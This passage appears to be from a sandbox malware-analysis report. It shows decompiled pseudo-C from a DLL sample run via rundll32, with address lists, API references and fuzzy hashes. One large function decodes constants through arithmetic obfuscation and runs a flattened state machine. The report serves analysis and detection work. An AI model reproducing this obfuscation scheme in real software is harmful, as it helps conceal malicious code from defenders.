					_t171 = E1000C727(_t279,  &_v20, 1, _v8, 0x2d, __esi + 0x2c);
					_t174 = E1000C727(_t279,  &_v20, 1, _v8, 0x2e, __esi + 0x30);
					_t177 = E1000C727(_t279,  &_v20, 1, _v8, 0x2f, __esi + 0x34);
					_t180 = E1000C727(_t279,  &_v20, 1, _v8, 0x30, __esi + 0x1c);
					_t183 = E1000C727(_t279,  &_v20, 1, _v8, 0x44, __esi + 0x38);
					_t186 = E1000C727(_t279,  &_v20, 1, _v8, 0x45, __esi + 0x3c);
					_t189 = E1000C727(_t279,  &_v20, 1, _v8, 0x46, __esi + 0x40);
					_t192 = E1000C727(_t279,  &_v20, 1, _v8, 0x47, __esi + 0x44);
					_t195 = E1000C727(_t279,  &_v20, 1, _v8, 0x48, __esi + 0x48);
					_t198 = E1000C727(_t279,  &_v20, 1, _v8, 0x49, __esi + 0x4c);
					_t201 = E1000C727(_t279,  &_v20, 1, _v8, 0x4a, __esi + 0x50);
					_t204 = E1000C727(_t279,  &_v20, 1, _v8, 0x4b, __esi + 0x54);
					_t207 = E1000C727(_t279,  &_v20, 1, _v8, 0x4c, __esi + 0x58);
					_t210 = E1000C727(_t279,  &_v20, 1, _v8, 0x4d, __esi + 0x5c);
					_t213 = E1000C727(_t279,  &_v20, 1, _v8, 0x4e, __esi + 0x60);
					_t216 = E1000C727(_t279,  &_v20, 1, _v8, 0x4f, __esi + 0x64);
					_t219 = E1000C727(_t279,  &_v20, 1, _v8, 0x38, __esi + 0x68);
					_t222 = E1000C727(_t279,  &_v20, 1, _v8, 0x39, __esi + 0x6c);
					_t225 = E1000C727(_t279,  &_v20, 1, _v8, 0x3a, __esi + 0x70);
					_t228 = E1000C727(_t279,  &_v20, 1, _v8, 0x3b, __esi + 0x74);
					_t231 = E1000C727(_t279,  &_v20, 1, _v8, 0x3c, __esi + 0x78);
					_t234 = E1000C727(_t279,  &_v20, 1, _v8, 0x3d, __esi + 0x7c);
					_t237 = E1000C727(_t279,  &_v20, 1, _v8, 0x3e, __esi + 0x80);
					_t240 = E1000C727(_t279,  &_v20, 1, _v8, 0x3f, __esi + 0x84);
					_t243 = E1000C727(_t279,  &_v20, 1, _v8, 0x40, __esi + 0x88);
					_t246 = E1000C727(_t279,  &_v20, 1, _v8, 0x41, __esi + 0x8c);
					_t249 = E1000C727(_t279,  &_v20, 1, _v8, 0x42, __esi + 0x90);
					_t252 = E1000C727(_t279,  &_v20, 1, _v8, 0x43, __esi + 0x94);
					_t255 = E1000C727(_t279,  &_v20, 1, _v8, 0x28, __esi + 0x98);
					_t258 = E1000C727(_t279,  &_v20, 1, _v8, 0x29, __esi + 0x9c);
					_t261 = E1000C727(_t279,  &_v20, 1, _v12, 0x1f, __esi + 0xa0);
					_t264 = E1000C727(_t279,  &_v20, 1, _v12, 0x20, __esi + 0xa4);
					_t267 = E1000C727(_t279,  &_v20, 1, _v12, 0x1003, __esi + 0xa8);
					_t276 = _v12;
					_t270 = E1000C727(_t279,  &_v20, 0, _t276, 0x1009, __esi + 0xb0);
					 *(__esi + 0xac) = _t276;
					return _t142 | _t145 | _t148 | _t151 | _t154 | _t157 | _t159 | _t162 | _t165 | _t168 | _t171 | _t174 | _t177 | _t180 | _t183 | _t186 | _t189 | _t192 | _t195 | _t198 | _t201 | _t204 | _t207 | _t210 | _t213 | _t216 | _t219 | _t222 | _t225 | _t228 | _t231 | _t234 | _t237 | _t240 | _t243 | _t246 | _t249 | _t252 | _t255 | _t258 | _t261 | _t264 | _t267 | _t270;
				} else {
					return __eax | 0xffffffff;
				}
			}

0x10010a04
0x10010a08
0x10010a0c
0x10010a0f
0x10010a14
0x10010a1b
0x10010a21
0x10010a33
0x10010a48
0x10010a5d
0x10010a72
0x10010a8a
0x10010a9f
0x10010ab1
0x10010ac6
0x10010ade
0x10010af3
0x10010b08
0x10010b1d
0x10010b35
0x10010b4a
0x10010b5f
0x10010b74
0x10010b8c
0x10010ba1
0x10010bb6
0x10010bcb
0x10010be3
0x10010bf8
0x10010c0d
0x10010c22
0x10010c3a
0x10010c4f
0x10010c64
0x10010c79
0x10010c91
0x10010ca6
0x10010cbb
0x10010cd0
0x10010ceb
0x10010d03
0x10010d1b
0x10010d33
0x10010d4e
0x10010d66
0x10010d7e
0x10010d96
0x10010db1
0x10010dc9
0x10010de4
0x10010df7
0x10010e01
0x10010e0e
0x10010e16
0x10010a16
0x10010a1a
0x10010a1a

APIs

___getlocaleinfo.LIBCMT ref: 10010A33
___getlocaleinfo.LIBCMT ref: 10010A48
___getlocaleinfo.LIBCMT ref: 10010A5D
___getlocaleinfo.LIBCMT ref: 10010A72
___getlocaleinfo.LIBCMT ref: 10010A8A
___getlocaleinfo.LIBCMT ref: 10010A9F
___getlocaleinfo.LIBCMT ref: 10010AB1
___getlocaleinfo.LIBCMT ref: 10010AC6
___getlocaleinfo.LIBCMT ref: 10010ADE
___getlocaleinfo.LIBCMT ref: 10010AF3

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ___getlocaleinfo
String ID:
API String ID: 1937885557-0
Opcode ID: d04f72e6812a02fed01aee00663be6446466a87147cf99734c158c6a74e1d766
Instruction ID: 373a512ba0ef4fc8f422f1cc41f902c08c3998079d01379570979cb3c01b4451
Opcode Fuzzy Hash: d04f72e6812a02fed01aee00663be6446466a87147cf99734c158c6a74e1d766
Instruction Fuzzy Hash: 24E1BDB290021DBEFB15CBE1CD85DFF77BDEB14784F04092AB259E2041EA75AA059B60

Uniqueness

Uniqueness Score: -1.00%

Function 002AB19F, Relevance: 34.4, Strings: 27, Instructions: 686
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E002AB19F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, signed int _a36, intOrPtr _a40) {
				char _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				intOrPtr* _v304;
				intOrPtr* _v308;
				intOrPtr* _t755;
				intOrPtr* _t760;
				intOrPtr* _t771;
				intOrPtr _t776;
				void* _t784;
				intOrPtr* _t785;
				intOrPtr* _t792;
				intOrPtr* _t793;
				signed int _t795;
				intOrPtr* _t796;
				intOrPtr* _t798;
				intOrPtr _t812;
				void* _t862;
				signed int _t879;
				signed int _t880;
				signed int _t881;
				signed int _t882;
				signed int _t883;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t889;
				signed int _t890;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				signed int _t898;
				signed int _t899;
				signed int _t901;
				void* _t907;
				void* _t909;
				void* _t914;

				_t796 = _a32;
				_push(_a40);
				_push(_a36 & 0x0000ffff);
				_push(_t796);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_a36 & 0x0000ffff);
				_t798 = 0;
				_t909 =  &_v308 + 0x30;
				_v12 = _v12 & 0;
				_v160 = 0x1339;
				_t907 = 0;
				_v160 = _v160 << 0xd;
				_t901 = 0x31bced90;
				_v160 = _v160 + 0xffff3e32;
				_v160 = _v160 ^ 0x02665e32;
				_v112 = 0xb1d8;
				_v112 = _v112 + 0x5d36;
				_t879 = 0x7d;
				_v16 = _v16 & 0;
				_v112 = _v112 * 0x17;
				_v112 = _v112 ^ 0x00185a51;
				_v288 = 0x8171;
				_v288 = _v288 + 0xffff45b3;
				_v308 = 0;
				_v288 = _v288 * 0x4b;
				_v288 = _v288 + 0xffff39e7;
				_v288 = _v288 ^ 0xffee91bb;
				_v96 = 0xdb68;
				_v96 = _v96 / _t879;
				_v96 = _v96 ^ 0x000081c1;
				_v20 = 0x4e3f;
				_t880 = 0x59;
				_v20 = _v20 * 0x5f;
				_v20 = _v20 ^ 0x001d4961;
				_v148 = 0x672f;
				_v148 = _v148 + 0x14e8;
				_v148 = _v148 | 0xbd4cf119;
				_v148 = _v148 ^ 0xbd0cfd1f;
				_v188 = 0x7fe0;
				_v188 = _v188 + 0xffff506e;
				_v188 = _v188 + 0xffff4de9;
				_v188 = _v188 ^ 0xfffb1e37;
				_v132 = 0x8ed7;
				_v132 = _v132 + 0xffff4a9f;
				_v132 = _v132 << 5;
				_v132 = _v132 ^ 0xfbfb2ec0;
				_v196 = 0x1370;
				_v196 = _v196 / _t880;
				_v196 = _v196 >> 6;
				_v196 = _v196 ^ 0x00080000;
				_v280 = 0x50b7;
				_v280 = _v280 ^ 0x5f2a23ad;
				_v280 = _v280 | 0x4bde55de;
				_v280 = _v280 + 0xffff78ad;
				_v280 = _v280 ^ 0x5ffdf28b;
				_v256 = 0xefa1;
				_v256 = _v256 << 7;
				_v256 = _v256 << 0xc;
				_t881 = 0x27;
				_v256 = _v256 * 0x49;
				_v256 = _v256 ^ 0xa7480100;
				_v156 = 0x3e86;
				_v156 = _v156 ^ 0xbe822b5f;
				_v156 = _v156 + 0xffffe6c1;
				_v156 = _v156 ^ 0x3e81fc9a;
				_v100 = 0xe928;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x000003a4;
				_v208 = 0xd18d;
				_v208 = _v208 + 0x5fab;
				_v208 = _v208 / _t881;
				_v208 = _v208 ^ 0x000007d0;
				_v184 = 0x2b99;
				_v184 = _v184 >> 6;
				_v184 = _v184 ^ 0x80e9db2e;
				_v184 = _v184 ^ 0x80e9cafc;
				_v192 = 0xd0e;
				_t882 = 0x4a;
				_v192 = _v192 / _t882;
				_v192 = _v192 | 0x2cf2bc77;
				_v192 = _v192 ^ 0x2cf28012;
				_v224 = 0x39c9;
				_v224 = _v224 ^ 0x251f87bc;
				_v224 = _v224 + 0x9795;
				_v224 = _v224 ^ 0x25203609;
				_v260 = 0x3acc;
				_v260 = _v260 << 0xf;
				_t883 = 0x35;
				_v260 = _v260 * 0xe;
				_v260 = _v260 | 0x21829eaa;
				_v260 = _v260 ^ 0xbb96ce1d;
				_v168 = 0x9ad7;
				_v168 = _v168 * 0xc;
				_v168 = _v168 >> 3;
				_v168 = _v168 ^ 0x0000a77d;
				_v252 = 0x66af;
				_v252 = _v252 ^ 0xd66deb92;
				_v252 = _v252 + 0xffff5d10;
				_v252 = _v252 ^ 0xb6fc5674;
				_v252 = _v252 ^ 0x6090c17b;
				_v176 = 0xfca7;
				_v176 = _v176 / _t883;
				_v176 = _v176 >> 0xf;
				_v176 = _v176 ^ 0x00007a63;
				_v152 = 0xa919;
				_t884 = 0x2d;
				_v152 = _v152 * 0x59;
				_v152 = _v152 / _t884;
				_v152 = _v152 ^ 0x00014165;
				_v244 = 0x5886;
				_t885 = 0x75;
				_v244 = _v244 / _t885;
				_v244 = _v244 + 0x7839;
				_t886 = 0x61;
				_v244 = _v244 / _t886;
				_v244 = _v244 ^ 0x00002a4b;
				_v64 = 0x224c;
				_v64 = _v64 << 8;
				_v64 = _v64 ^ 0x0022569d;
				_v28 = 0x6aaa;
				_v28 = _v28 + 0xf895;
				_v28 = _v28 ^ 0x0001180b;
				_v32 = 0xcf2a;
				_v32 = _v32 >> 5;
				_v32 = _v32 ^ 0x000078e8;
				_v144 = 0x27d7;
				_t887 = 0x31;
				_v144 = _v144 * 0x4c;
				_v144 = _v144 * 0x6f;
				_v144 = _v144 ^ 0x0520d70d;
				_v68 = 0xe124;
				_v68 = _v68 | 0x6e32588f;
				_v68 = _v68 ^ 0x6e32ff55;
				_v76 = 0x2dd5;
				_v76 = _v76 / _t887;
				_v76 = _v76 ^ 0x00005f83;
				_v128 = 0x69c1;
				_v128 = _v128 << 0xc;
				_v128 = _v128 + 0x18cb;
				_v128 = _v128 ^ 0x069c30c6;
				_v84 = 0x685f;
				_v84 = _v84 << 0xc;
				_v84 = _v84 ^ 0x0685e5c1;
				_v92 = 0x2705;
				_v92 = _v92 | 0x69949ce5;
				_v92 = _v92 ^ 0x6994dc6c;
				_v120 = 0xc01;
				_v120 = _v120 << 9;
				_v120 = _v120 >> 7;
				_v120 = _v120 ^ 0x000073ca;
				_v60 = 0x272a;
				_v60 = _v60 >> 0xe;
				_v60 = _v60 ^ 0x0000747c;
				_v72 = 0x4038;
				_v72 = _v72 ^ 0x7ebb9374;
				_v72 = _v72 ^ 0x7ebbeb7f;
				_v268 = 0x21e6;
				_v268 = _v268 ^ 0x855290ef;
				_v268 = _v268 + 0xffff2fcc;
				_v268 = _v268 << 0xa;
				_v268 = _v268 ^ 0x47834e4c;
				_v40 = 0x51d;
				_v40 = _v40 >> 0xa;
				_v40 = _v40 ^ 0x000068bf;
				_v276 = 0x64c3;
				_t888 = 0x56;
				_v276 = _v276 * 0x26;
				_v276 = _v276 | 0x794a73c0;
				_v276 = _v276 / _t888;
				_v276 = _v276 ^ 0x01693117;
				_v284 = 0x36ef;
				_v284 = _v284 + 0x3a04;
				_v284 = _v284 | 0xbe2b26e1;
				_v284 = _v284 + 0xfffff45e;
				_v284 = _v284 ^ 0xbe2b7ee9;
				_v204 = 0x454e;
				_v204 = _v204 + 0xffff7785;
				_v204 = _v204 >> 0xc;
				_v204 = _v204 ^ 0x000fd798;
				_v108 = 0x47c3;
				_t889 = 0x2f;
				_v108 = _v108 * 0x71;
				_v108 = _v108 ^ 0x001fdfd6;
				_v124 = 0xb7e5;
				_v124 = _v124 + 0xffffcb4c;
				_v124 = _v124 * 0x68;
				_v124 = _v124 ^ 0x00354302;
				_v88 = 0x235d;
				_v88 = _v88 + 0xffff8c3e;
				_v88 = _v88 ^ 0xffffcd48;
				_v240 = 0xfd07;
				_v240 = _v240 >> 4;
				_v240 = _v240 / _t889;
				_t890 = 0x1b;
				_v240 = _v240 * 0x58;
				_v240 = _v240 ^ 0x00004d40;
				_v116 = 0x52d5;
				_v116 = _v116 + 0x60e6;
				_v116 = _v116 * 0x53;
				_v116 = _v116 ^ 0x003a50ef;
				_v180 = 0x27ce;
				_v180 = _v180 * 0x69;
				_v180 = _v180 + 0x9fd3;
				_v180 = _v180 ^ 0x0010bdc5;
				_v48 = 0xf6a0;
				_v48 = _v48 / _t890;
				_v48 = _v48 ^ 0x000033dc;
				_v272 = 0x58a3;
				_v272 = _v272 << 0xb;
				_v272 = _v272 | 0xd69fa64e;
				_t891 = 0x61;
				_v272 = _v272 * 0x58;
				_v272 = _v272 ^ 0xdce90924;
				_v172 = 0x7e37;
				_v172 = _v172 / _t891;
				_t892 = 9;
				_v172 = _v172 / _t892;
				_v172 = _v172 ^ 0x00005630;
				_v24 = 0xf615;
				_v24 = _v24 + 0xffff71a4;
				_v24 = _v24 ^ 0x0000587e;
				_v140 = 0xbab0;
				_v140 = _v140 + 0x3358;
				_v140 = _v140 * 0x1e;
				_v140 = _v140 ^ 0x001bfc19;
				_v296 = 0x98c3;
				_v296 = _v296 >> 0xe;
				_v296 = _v296 << 0xf;
				_v296 = _v296 + 0xffffe6b8;
				_v296 = _v296 ^ 0x0000bcda;
				_v300 = 0xd4d5;
				_v300 = _v300 | 0x09eeb1ab;
				_v300 = _v300 << 6;
				_v300 = _v300 ^ 0xab71b752;
				_v300 = _v300 ^ 0xd0ccf59d;
				_v248 = 0x9309;
				_v248 = _v248 >> 0xa;
				_t893 = 0x24;
				_v248 = _v248 / _t893;
				_t444 =  &_v248; // 0x7839
				_t894 = 0x3a;
				_v248 =  *_t444 * 0x15;
				_v248 = _v248 ^ 0x000024c1;
				_v228 = 0x1ab1;
				_v228 = _v228 / _t894;
				_v228 = _v228 ^ 0x40c67f86;
				_t895 = 0x2b;
				_v228 = _v228 * 0x44;
				_v228 = _v228 ^ 0x34b9c14e;
				_v136 = 0x2bd4;
				_v136 = _v136 * 0x32;
				_v136 = _v136 + 0x4edc;
				_v136 = _v136 ^ 0x0008bcab;
				_v104 = 0xcc10;
				_v104 = _v104 | 0x4d8cf12d;
				_v104 = _v104 ^ 0x4d8cbfc4;
				_v236 = 0xa7;
				_v236 = _v236 | 0x5ad4fef6;
				_v236 = _v236 + 0xffffd4d8;
				_v236 = _v236 + 0xd6d4;
				_v236 = _v236 ^ 0x5ad5d136;
				_v56 = 0x5606;
				_v56 = _v56 / _t895;
				_v56 = _v56 ^ 0x00005df2;
				_v212 = 0x799b;
				_v212 = _v212 | 0x588104aa;
				_t896 = 0x33;
				_v212 = _v212 / _t896;
				_v212 = _v212 ^ 0x01bc6b6f;
				_v292 = 0x67de;
				_v292 = _v292 + 0x20cd;
				_t897 = 0x2a;
				_v292 = _v292 * 0x2a;
				_v292 = _v292 ^ 0xa1605a45;
				_v292 = _v292 ^ 0xa1762f75;
				_v164 = 0xc571;
				_v164 = _v164 >> 1;
				_v164 = _v164 >> 3;
				_v164 = _v164 ^ 0x0000686b;
				_v80 = 0xad1b;
				_v80 = _v80 ^ 0x855e7d08;
				_v80 = _v80 ^ 0x855ead16;
				_v232 = 0x15a0;
				_v232 = _v232 * 0x58;
				_v232 = _v232 | 0xcb88fba0;
				_v232 = _v232 ^ 0xb8369652;
				_v232 = _v232 ^ 0x73b975c2;
				_v216 = 0x5e8a;
				_v216 = _v216 | 0xda374bd0;
				_v216 = _v216 ^ 0x4d4d4516;
				_v216 = _v216 ^ 0x977a2004;
				_v264 = 0x5872;
				_v264 = _v264 >> 0xe;
				_v264 = _v264 / _t897;
				_v264 = _v264 | 0x91c5ad7a;
				_v264 = _v264 ^ 0x91c5d95c;
				_v200 = 0x4938;
				_v200 = _v200 + 0xe8da;
				_t898 = 0x6e;
				_v200 = _v200 / _t898;
				_v200 = _v200 ^ 0x00006631;
				_v36 = 0xd627;
				_v36 = _v36 + 0x25d6;
				_v36 = _v36 ^ 0x0000aaed;
				_v220 = 0xdf41;
				_v220 = _v220 ^ 0x91b73bb2;
				_v220 = _v220 + 0x6473;
				_v220 = _v220 ^ 0x91b83c13;
				_v44 = 0x2c1a;
				_t899 = 0x68;
				_v44 = _v44 / _t899;
				_v44 = _v44 ^ 0x000011ca;
				_v52 = 0x6b36;
				_v52 = _v52 | 0x11eac64c;
				_v52 = _v52 ^ 0x11eaf934;
				_t900 = _v12;
				while(1) {
					L1:
					_t862 = 0x12445ff0;
					while(1) {
						_t914 = _t901 - _t862;
						if(_t914 <= 0) {
						}
						L3:
						if(_t914 == 0) {
							_push(_v284);
							_t760 = E002AC87B(_v208, _v8, _v72, _a36, _v268, _a8, _v40, _t798, _v276);
							_t909 = _t909 - 0xc + 0x2c;
							_v304 = _t760;
							__eflags = _t760;
							_t901 =  !=  ? 0x74dd101 : 0x11d261d8;
							L13:
							_t798 = _v308;
							goto L1;
						}
						if(_t901 == 0xd59b4e) {
							E002993CC(_v212, _v292, _t900, _v164, _v80);
							_t909 = _t909 + 0xc;
							L20:
							_t901 = 0xedec84c;
							L12:
							_t760 = _v304;
							goto L13;
						}
						if(_t901 == 0x74dd101) {
							__eflags = _t796;
							if(__eflags != 0) {
								_push(_v124);
								_push(_v108);
								_t798 = E00296ABA(_v204, 0x2af950, __eflags);
								_v308 = _t798;
							}
							_push(_v48);
							_push(_v304);
							_push(_t798);
							_push(_v156 | _v256 | _v280 | _v196 | _v132 | _v188 | _v148 | _v20 | _v96);
							_push(_v180);
							_push(_v116);
							_push(_v240);
							_push(_a16);
							_t771 = E00291000(_t798, _v88);
							_t900 = _t771;
							_t803 = _v272;
							E0029F935(_v272, _v308, _v172, _v24);
							_t909 = _t909 - 0xc + 0x34;
							__eflags = _t771;
							if(__eflags == 0) {
								goto L20;
							} else {
								_v4 = 1;
								_t776 = E002AA226(_v140, _t900,  &_v4, _v296, _t803, _v300, _v248);
								_t909 = _t909 + 0x18;
								_v4 = _t776;
								_t901 = 0x36a336ee;
								goto L12;
							}
						}
						if(_t901 == 0x7ded751) {
							__eflags = E002ACFBD(_t900, _v112, __eflags) - _v288;
							_t901 =  ==  ? 0x33a6c6f4 : 0xd59b4e;
							goto L12;
						}
						if(_t901 == 0xedec84c) {
							E002993CC(_v232, _v216, _t760, _v264, _v200);
							_t909 = _t909 + 0xc;
							_t901 = 0x11d261d8;
							goto L12;
						}
						if(_t901 != 0x11d261d8) {
							L42:
							__eflags = _t901 - 0x2420cac1;
							if(__eflags == 0) {
								L10:
								return _t907;
							}
							while(1) {
								_t914 = _t901 - _t862;
								if(_t914 <= 0) {
								}
								goto L22;
							}
							goto L3;
						}
						E002993CC(_v36, _v220, _v8, _v44, _v52);
						goto L10;
						L22:
						__eflags = _t901 - 0x2c2f6692;
						if(_t901 == 0x2c2f6692) {
							_t755 = E002A4CEF(_t798, _v68, _v76, _t798, _v128, _v16, _v84, _t798, _v92, _v100);
							__eflags = _t755;
							_v8 = _t755;
							_t901 =  !=  ? 0x12445ff0 : 0x2420cac1;
							E0029EF80(_v120, _v16, _v60);
							_t798 = _v308;
							_t909 = _t909 + 0x24;
							_t862 = 0x12445ff0;
							goto L42;
						}
						__eflags = _t901 - 0x31bced90;
						if(__eflags == 0) {
							_t901 = 0x3a24194a;
							continue;
						}
						__eflags = _t901 - 0x33a6c6f4;
						if(_t901 == 0x33a6c6f4) {
							__eflags = E002A0705(_t900, _a20);
							_t901 = 0xd59b4e;
							_t784 = 1;
							_t907 =  !=  ? _t784 : _t907;
							goto L12;
						}
						__eflags = _t901 - 0x36a336ee;
						if(_t901 == 0x36a336ee) {
							__eflags = _t796;
							if(_t796 == 0) {
								_t812 = 0;
								__eflags = 0;
							} else {
								_t812 =  *_t796;
							}
							__eflags = _t796;
							if(_t796 == 0) {
								_t785 = 0;
								__eflags = 0;
							} else {
								_t785 =  *((intOrPtr*)(_t796 + 4));
							}
							E002910D6(_v228, _v136, _v104, _v236, _t785, _t812, _t812, _a40, _v56, _t900);
							_t909 = _t909 + 0x20;
							asm("sbb esi, esi");
							_t901 = (_t901 & 0x07093c03) + 0xd59b4e;
							goto L12;
						}
						__eflags = _t901 - 0x3a24194a;
						if(_t901 != 0x3a24194a) {
							goto L42;
						}
						_push(0x200);
						_push(0x200);
						_v12 = 0x200;
						_t792 = E002A9E2B(0x200);
						_t904 = _t792;
						_t909 = _t909 + 0xc;
						__eflags = _t792;
						if(__eflags != 0) {
							_push(0x200);
							_t815 = _v168;
							_t793 = E002A0BA4(_v168,  &_v12, _v252, _v176, _t904);
							_t909 = _t909 + 0x10;
							__eflags = _t793;
							if(_t793 == 0) {
								_t795 = E002A5060(_v152, _t904, _v244, _v160, _t815, _t815, _v64, _v28);
								_t909 = _t909 + 0x18;
								_v16 = _t795;
							}
							E0029EF80(_v32, _t904, _v144);
						}
						_t901 = 0x2c2f6692;
						goto L12;
					}
				}
			}

0x002ab1ad
0x002ab1b7
0x002ab1c1
0x002ab1c2
0x002ab1c3
0x002ab1ca
0x002ab1d1
0x002ab1d8
0x002ab1df
0x002ab1e6
0x002ab1ed
0x002ab1f4
0x002ab1f5
0x002ab1f6
0x002ab1fb
0x002ab1fd
0x002ab200
0x002ab209
0x002ab214
0x002ab216
0x002ab21e
0x002ab223
0x002ab22e
0x002ab239
0x002ab244
0x002ab259
0x002ab25c
0x002ab263
0x002ab26a
0x002ab275
0x002ab27d
0x002ab28a
0x002ab28e
0x002ab292
0x002ab29a
0x002ab2a2
0x002ab2b8
0x002ab2bf
0x002ab2ca
0x002ab2dd
0x002ab2de
0x002ab2e5
0x002ab2f0
0x002ab2fb
0x002ab306
0x002ab311
0x002ab31c
0x002ab327
0x002ab332
0x002ab33d
0x002ab348
0x002ab353
0x002ab35e
0x002ab366
0x002ab371
0x002ab385
0x002ab38c
0x002ab394
0x002ab39f
0x002ab3a7
0x002ab3af
0x002ab3b7
0x002ab3bf
0x002ab3c7
0x002ab3cf
0x002ab3d6
0x002ab3e2
0x002ab3e5
0x002ab3e9
0x002ab3f1
0x002ab3fc
0x002ab407
0x002ab412
0x002ab41d
0x002ab428
0x002ab430
0x002ab43b
0x002ab443
0x002ab453
0x002ab457
0x002ab45f
0x002ab46a
0x002ab472
0x002ab47d
0x002ab488
0x002ab49a
0x002ab49f
0x002ab4a8
0x002ab4b3
0x002ab4be
0x002ab4c6
0x002ab4ce
0x002ab4d6
0x002ab4de
0x002ab4e6
0x002ab4f0
0x002ab4f3
0x002ab4f7
0x002ab4ff
0x002ab507
0x002ab51a
0x002ab521
0x002ab529
0x002ab534
0x002ab53c
0x002ab544
0x002ab54c
0x002ab554
0x002ab55c
0x002ab572
0x002ab579
0x002ab581
0x002ab58c
0x002ab59f
0x002ab5a2
0x002ab5b4
0x002ab5bb
0x002ab5c6
0x002ab5d2
0x002ab5d5
0x002ab5d9
0x002ab5e9
0x002ab5ee
0x002ab5f4
0x002ab5fc
0x002ab607
0x002ab60f
0x002ab61a
0x002ab625
0x002ab630
0x002ab63b
0x002ab646
0x002ab64e
0x002ab659
0x002ab66c
0x002ab66f
0x002ab67e
0x002ab685
0x002ab690
0x002ab69b
0x002ab6a6
0x002ab6b1
0x002ab6c7
0x002ab6ce
0x002ab6d9
0x002ab6e4
0x002ab6ec
0x002ab6f7
0x002ab702
0x002ab70d
0x002ab715
0x002ab720
0x002ab72b
0x002ab736
0x002ab741
0x002ab74c
0x002ab754
0x002ab75c
0x002ab767
0x002ab772
0x002ab77a
0x002ab785
0x002ab790
0x002ab79b
0x002ab7a6
0x002ab7ae
0x002ab7b6
0x002ab7be
0x002ab7c3
0x002ab7cb
0x002ab7d6
0x002ab7de
0x002ab7e9
0x002ab7f6
0x002ab7f7
0x002ab7fb
0x002ab809
0x002ab80d
0x002ab815
0x002ab81d
0x002ab825
0x002ab82d
0x002ab835
0x002ab83d
0x002ab845
0x002ab84d
0x002ab852
0x002ab85a
0x002ab871
0x002ab874
0x002ab87b
0x002ab886
0x002ab891
0x002ab8a4
0x002ab8ab
0x002ab8b6
0x002ab8c1
0x002ab8cc
0x002ab8d7
0x002ab8df
0x002ab8ec
0x002ab8f5
0x002ab8f8
0x002ab8fc
0x002ab904
0x002ab90f
0x002ab922
0x002ab929
0x002ab934
0x002ab947
0x002ab94e
0x002ab959
0x002ab964
0x002ab97a
0x002ab981
0x002ab98c
0x002ab994
0x002ab999
0x002ab9a6
0x002ab9a9
0x002ab9ad
0x002ab9b5
0x002ab9cb
0x002ab9d9
0x002ab9dc
0x002ab9e3
0x002ab9ee
0x002ab9f9
0x002aba04
0x002aba0f
0x002aba1a
0x002aba2d
0x002aba34
0x002aba3f
0x002aba47
0x002aba4c
0x002aba51
0x002aba59
0x002aba61
0x002aba69
0x002aba71
0x002aba76
0x002aba7e
0x002aba86
0x002aba8e
0x002aba9b
0x002abaa0
0x002abaa6
0x002abaab
0x002abaae
0x002abab2
0x002ababa
0x002abaca
0x002abace
0x002abadb
0x002abade
0x002abae2
0x002abaea
0x002abafd
0x002abb04
0x002abb0f
0x002abb1a
0x002abb25
0x002abb30
0x002abb3b
0x002abb43
0x002abb4b
0x002abb53
0x002abb5b
0x002abb63
0x002abb79
0x002abb80
0x002abb8b
0x002abb93
0x002abb9f
0x002abba4
0x002abbaa
0x002abbb2
0x002abbba
0x002abbc7
0x002abbc8
0x002abbcc
0x002abbd4
0x002abbdc
0x002abbe7
0x002abbee
0x002abbf6
0x002abc01
0x002abc0c
0x002abc17
0x002abc22
0x002abc2f
0x002abc33
0x002abc3b
0x002abc43
0x002abc4b
0x002abc53
0x002abc5b
0x002abc63
0x002abc6b
0x002abc73
0x002abc7e
0x002abc82
0x002abc8c
0x002abc94
0x002abc9c
0x002abcaa
0x002abcaf
0x002abcb8
0x002abcc3
0x002abcce
0x002abcd9
0x002abce4
0x002abcec
0x002abcf4
0x002abcfc
0x002abd04
0x002abd16
0x002abd19
0x002abd20
0x002abd2f
0x002abd3a
0x002abd45
0x002abd50
0x002abd57
0x002abd57
0x002abd57
0x002abd5c
0x002abd5c
0x002abd5e
0x002abd5e
0x002abd64
0x002abd64
0x002abf47
0x002abf81
0x002abf86
0x002abf89
0x002abf8d
0x002abf99
0x002abdf5
0x002abdf5
0x00000000
0x002abdf5
